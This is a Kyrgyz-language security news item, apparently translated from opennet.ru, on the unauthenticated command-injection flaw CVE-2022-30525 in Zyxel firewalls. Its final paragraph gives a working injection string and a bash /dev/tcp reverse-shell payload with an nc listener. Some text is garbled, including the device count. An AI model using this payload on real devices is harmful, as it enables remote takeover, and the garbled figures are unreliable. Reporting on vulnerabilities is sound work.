Ишканаларда брандмауэрлердин, IDSтин жана VPNдин иштешин уюштуруу үчүн иштелип чыккан ATP, VPN жана USG FLEX сериясындагы Zyxel түзмөктөрүндө тышкы чабуулчуга кодду ишке ашырууга мүмкүндүк берген олуттуу аялуу (CVE-2022-30525) аныкталган. аутентификациясыз колдонуучунун укуктары жок түзмөк. Чабуул жасоо үчүн чабуулчу HTTP/HTTPS протоколун колдонуу менен түзмөккө суроо-талаптарды жөнөтө алышы керек. Zyxel ZLD 5.30 микропрограммасын жаңыртуудагы кемчиликти оңдоду. Shodan кызматынын маалыматы боюнча, учурда глобалдык тармакта HTTP/HTTPS аркылуу суроо-талаптарды кабыл алган 16213 XNUMX потенциалдуу аялуу түзмөк бар.
Операция /ztp/cgi-bin/handler веб-ишкерине атайын иштелип чыккан буйруктарды жөнөтүү аркылуу жүзөгө ашырылат, аутентификациясыз жеткиликтүү. Көйгөй lib_wan_settings.py китепканасында колдонулган жана setWanPortSt операциясын иштетүүдө аткарылган os.system чалуу аркылуу системада буйруктарды аткарууда суроо-талаптын параметрлерин туура тазалоонун жоктугунан келип чыгат.
Мисалы, чабуулчу сапты өткөрүшү мүмкүн “; ping 192.168.1.210;" бул системадагы "ping 192.168.1.210" буйругун аткарууга алып келет. Буйрук кабыгына кирүү үчүн, сиз тутумуңузда “nc -lvnp 1270” иштетип, андан кийин түзмөккө '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.
Source: opennet.ru